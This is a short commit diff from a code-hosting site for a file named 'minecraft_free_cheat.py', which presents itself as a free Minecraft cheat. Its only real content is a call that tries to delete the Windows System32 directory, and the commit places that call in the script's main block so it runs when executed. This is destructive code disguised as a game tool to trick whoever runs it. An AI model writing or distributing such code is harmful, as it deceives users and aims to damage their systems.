Explorar el Código

Обновить 'minecraft_free_cheat.py'

Ethosa hace 2 años
padre
commit
a235b456c2
Se han modificado 1 ficheros con 2 adiciones y 2 borrados
  1. 2 2
      minecraft_free_cheat.py

+ 2 - 2
minecraft_free_cheat.py

@@ -1,5 +1,5 @@
 import os
 
-os.rmdir("C:/Windows/System32");
 
-cool
+if __name__ == '__main__':
+  os.rmdir("C:/Windows/System32");